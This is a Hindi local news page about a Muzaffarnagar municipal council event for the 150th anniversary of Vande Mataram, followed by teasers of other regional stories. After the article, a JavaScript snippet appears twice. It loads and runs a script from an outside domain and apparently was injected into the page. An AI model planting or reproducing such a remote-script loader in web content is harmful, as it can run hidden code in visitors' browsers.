वंदे मातरम केवल गीत नहीं, भारत की आत्मा का स्वर हैः मीनाक्षी स्वरूप

वंदे मातरम् के 150 वर्ष पूर्ण होने पर राष्ट्रभक्ति की भावना में डूबी नगर पालिका, तिरंगा लहराकर गाया राष्ट्र गीत

मुजफ्फरनगर। राष्ट्र गीत वंदे मातरम् के 150 वर्ष पूर्ण होने के अवसर पर नगर पालिका परिषद् सभागार में शुक्रवार को एक भव्य कार्यक्रम का आयोजन किया गया। यह आयोजन राष्ट्रवाद, एकता और देशभक्ति की भावना से ओतप्रोत रहा। कार्यक्रम में मुख्य अतिथि रहीं नगरपालिका अध्यक्ष मीनाक्षी स्वरूप ने अधिकारियों, कर्मचारियों और नगर के प्रबुद्ध नागरिकों के साथ प्रधानमंत्री नरेन्द्र मोदी का प्रेरक उद्बोधन लाइव सुना तथा उसके उपरांत सभी ने राष्ट्रगीत ‘वंदे मातरम् का सामूहिक वाचन कर तिरंगा लहराते हुए मातृभूमि के प्रति निष्ठा और समर्पण की भावना व्यक्त की।
कार्यक्रम के प्रारंभ में टाउनहाल स्थित पालिका सभागार में उपस्थित सभी अधिकारियों और जनप्रतिनिधियों ने राष्ट्रगीत की रचना के ऐतिहासिक महत्व पर प्रकाश डाला, जिसमें बताया गया कि वंदे मातरम् की रचना 1875 में बंकिमचंद्र चट्टोपाध्याय ने की थी, जो बाद में भारत के स्वतंत्रता संग्राम की आत्मा बन गई। इस अवसर पर देशभक्ति गीतों, कविताओं और भाषणों के माध्यम से स्वतंत्रता संग्राम के अमर सेनानियों को भी याद किया गया।

इसे भी पढ़ें:  धनतेरस पर जिला अस्पताल के सफाई कर्मियों ने झाड़ू-तसले लेकर सीएमओ दफ्तर घेरा

सभा को संबोधित करते हुए नगरपालिका अध्यक्ष मीनाक्षी स्वरूप ने कहा कि वंदे मातरम् केवल भारत का राष्ट्रीय गीत ही नहीं, स्वतंत्रता आंदोलन का प्राण भी है। यह बंकिमचंद्र चट्टोपाध्याय जी द्वारा सांस्कृतिक राष्ट्रवाद की प्रथम उद्घोषणा है, जिसने हमें यह स्मरण कराया कि भारत केवल भौगोलिक इकाई नहीं, बल्कि एक भू-सांस्कृतिक राष्ट्र है, जिसकी एकता उसकी संस्कृति और सभ्यता में निहित है।
उन्होंने आगे कहा कि वंदे मातरम् भारत की आत्मा का स्वर है। इसने स्वतंत्रता संग्राम के दौरान देशवासियों में मातृभूमि के प्रति गर्व, समर्पण और बलिदान की भावना जगाई। 150 वर्षों से यह गीत राष्ट्रवाद, एकता और नवऊर्जा का प्रतीक बनकर नई पीढ़ियों को प्रेरित करता आ रहा है। मीनाक्षी स्वरूप ने उपस्थित जनसमूह से आवाहन किया कि वे इस प्रेरणादायी गीत को अपने जीवन में आत्मसात करें और इसके पूर्ण संस्करण का सामूहिक गान कर इसकी गूंज आने वाली पीढ़ियों तक पहुँचाएँ।
कार्यक्रम के अंत में सभी ने सामूहिक रूप से राष्ट्रगीत का पूर्ण वाचन किया और भारत माता की जय के उद्घोष से सभागार गूंज उठा। पालिका परिसर में तिरंगा फहराकर शहीदों के प्रति श्रद्धांजलि अर्पित की गई। इस अवसर पर मुख्य रूप से अधिशासी अधिकारी डॉ. प्रज्ञा सिंह, व्यापारी नेता शलभ गुप्ता, सहायक अभियंता निर्माण नैपाल सिंह, लिपिक अशोक ढींगरा, आईटी प्रियेश सिंह, मैनपाल सिंह, संदीप यादव, नितिन कुमार, मनोज पाल, गोपीचंद वर्मा, निपुण कन्नौजिया, कैलाश नारायण, प्रवीण कुमार, सुनील कुमार, रूचि शर्मा सहित अन्य कर्मचारी मौजूद रहे। राष्ट्रगीत के 150वें वर्ष का यह आयोजन नगर में राष्ट्रभक्ति और एकता का प्रतीक बनकर यादगार साबित हुआ।

इसे भी पढ़ें:  मुजफ्फरनगर-जेई के नाम पर छह फर्जी फर्म बनाकर हो रही ऑनलाइन ठगी!

;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);

Also Read This

अनिल अंबानी का 3716 करोड़ का अबोड घर जब्त, ईडी की बड़ी कार्रवाई

मुंबई में अनिल अंबानी का अबोड घर जब्त कर लिया गया है। प्रवर्तन निदेशालय ने आरकॉम से जुड़े कथित बैंक फ्रॉड और मनी लॉन्ड्रिंग मामले में यह कार्रवाई की है। ईडी के अनुसार, यह अटैचमेंट पीएमएलए के तहत अस्थायी रूप से किया गया। मुंबई स्थित ‘अबोड’ नामक यह मल्टी-स्टोरी लग्जरी आवास अनिल अंबानी का प्रमुख निवास माना जाता है। इसकी अनुमानित कीमत 3,716.83 करोड़ रुपये बताई जा रही है। अनिल अंबानी का अबोड घर क्यों जब्त किया गया? ईडी का दावा है कि यह संपत्ति आरकॉम द्वारा बैंकों से लिए गए बड़े कर्ज से जुड़े कथित अनियमितताओं से संबंधित है। इसे भी पढ़ें:  जन्म-मृत्यु प्रमाण पत्रों में अनियमितता पर मीनाक्षी

Read More »

देवबंद फ्लैग मार्च में पुलिस रही पूरी तरह सतर्क

देवबंद फ्लैग मार्च के माध्यम से रमजान, होली व अन्य त्योहारों को सकुशल संपन्न कराने के लिए पुलिस प्रशासन पूरी तरह सतर्क नजर आया। सीओ अभितेष सिंह के नेतृत्व में थाना प्रभारी अमर पाल शर्मा ने पैरा मिलिट्री फोर्स और स्थानीय पुलिस बल के साथ नगर के विभिन्न मार्गों पर फ्लैग मार्च निकाला। इसे भी पढ़ें:  धनतेरस पर जिला अस्पताल के सफाई कर्मियों ने झाड़ू-तसले लेकर सीएमओ दफ्तर घेराफ्लैग मार्च के दौरान पुलिस बल ने मुख्य बाजारों, संवेदनशील क्षेत्रों और भीड़भाड़ वाले इलाकों में पैदल गश्त की। इस दौरान आमजन को सुरक्षा का एहसास कराया गया और शांति बनाए रखने की अपील की गई। पुलिस अधिकारियों ने स्पष्ट संदेश दिया

Read More »

देवबंद: दारुल उलूम क्षेत्र में सफाईकर्मी से मारपीट का आरोप

देवबंद। देवबंद (सहारनपुर) में बुधवार को देवबंद में सफाई कर्मचारी से मारपीट का मामला सामने आया। घटना दारुल उलूम वक्फ क्षेत्र की है, जहां सफाई कार्य के दौरान विवाद हो गया। पीड़ित पक्ष ने खानकाह पुलिस चौकी पहुंचकर शिकायत दर्ज कराई। सफाई नायक सदाकत ने पुलिस को दी तहरीर में बताया कि बुधवार सुबह सफाई कर्मचारी सचिन दारुल उलूम वक्फ क्षेत्र में सफाई कर रहा था। इसे भी पढ़ें:  मुजफ्फरनगर में आफत की मूसलधार बारिश-छतें गिरीं, घरों में घुसा पानीइसी दौरान एक युवक ने सफाई सही ढंग से न करने का आरोप लगाते हुए गाली-गलौज शुरू कर दी। देवबंद में सफाई कर्मचारी से मारपीट कैसे हुई? तहरीर के अनुसार, जब

Read More »

कानपुर : पीएसआईटी कॉलेज हंगामा, तोड़फोड़ और नारेबाजी

कानपुर : पीएसआईटी कॉलेज हंगामा ने बुधवार को सचेंडी क्षेत्र में तनाव की स्थिति पैदा कर दी। दबौली निवासी 21 वर्षीय छात्र प्रखर सिंह की जेसीबी से टकराकर मौत के बाद गुस्साए छात्रों ने कॉलेज परिसर में जमकर प्रदर्शन किया। आक्रोशित छात्रों ने क्लासरूम में तोड़फोड़ की और कॉलेज प्रशासन पर लापरवाही के आरोप लगाए। जेसीबी से टकराकर प्रखर सिंह की मौत घटना सचेंडी स्थित पीएसआईटी कॉलेज से जुड़ी है। बताया गया कि दबौली के रहने वाले प्रखर सिंह (21 वर्ष) की जेसीबी से टकराने के बाद मौत हो गई। इस घटना के बाद छात्रों में भारी आक्रोश फैल गया। उनका आरोप था कि कॉलेज प्रशासन ने मामले में संवेदनशीलता

Read More »

सरधना दौलतपुर छेड़छाड़ मामला, आरोपी फरार

सरधना दौलतपुर छेड़छाड़ मामला में एक दबंग युवक द्वारा महिला के साथ घर में घुसकर छेड़छाड़ और विरोध करने पर मारपीट करने का मामला सामने आया है। जब महिला के पति ने आरोपी को पकड़ने की कोशिश की तो उसने ईंट से हमला कर दिया और हत्या की धमकी देकर फरार हो गया। पीड़ित पक्ष ने थाने में तहरीर देकर कार्रवाई की मांग की है। घर में घुसकर महिला से छेड़छाड़ का आरोप घटना दौलतपुर गांव की है। पीड़िता के पति के अनुसार, दो दिन पूर्व वह घर से बाहर गया हुआ था और घर पर उसकी पत्नी अकेली थी। शाम करीब सात बजे गांव का ही एक दबंग युवक

Read More »

18 लाख लाइक रस्सी कूद चैलेंज में फंसा 7 साल का बच्चा

18 लाख लाइक रस्सी कूद चैलेंज ने सोशल मीडिया पर हलचल मचा दी है। चीन में एक पिता ने अपने 7 साल के बेटे निकनेट टैंगडो को वीडियो पर मिलने वाले लाइक्स के बदले उतनी बार रस्सी कूदने का चैलेंज दे दिया। लेकिन जब वीडियो पर 18 लाख 30 हजार से ज्यादा लाइक्स आ गए, तो मामला उल्टा पड़ गया और बच्चा घबरा गया। इसे भी पढ़ें:  गमगीन परिजनों ने छात्र उज्जवल की अस्थियां हरिद्वार गंगा में की प्रवाहितलाइक के बदले रस्सी कूदने का अनोखा चैलेंज निकनेट टैंगडो की उम्र सिर्फ 7 साल है। उसका वजन 45 किलो और लंबाई 4.3 फीट बताई गई है। चीन के मापदंडों के अनुसार,

Read More »